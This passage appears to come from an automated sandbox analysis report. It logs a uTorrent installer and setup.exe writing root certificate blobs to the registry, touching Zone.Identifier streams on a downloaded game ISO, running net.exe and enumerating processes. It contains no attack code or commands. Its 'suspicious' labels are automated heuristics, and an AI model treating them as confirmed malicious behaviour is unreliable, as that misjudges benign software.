4686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 040000000100000010000000ee2931bc327e9ae6e8b5f751b4347190030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d34317e000000010000000800000000c001b39667d6011d0000000100000010000000e871723e266f38af5d49cda2a502669c14000000010000001400000055e481d11180bed889b908a331f9a1240916b9700b000000010000001e00000045006e0074007200750073007400200028003200300034003800290000006200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1777f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d819000000010000001000000091fad483f14848a8a69b18b805cdbb3a20000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\codex-the.longing.iso:Zone.Identifier C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
File opened for modification C:\Users\Admin\Downloads\SteamSetup.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
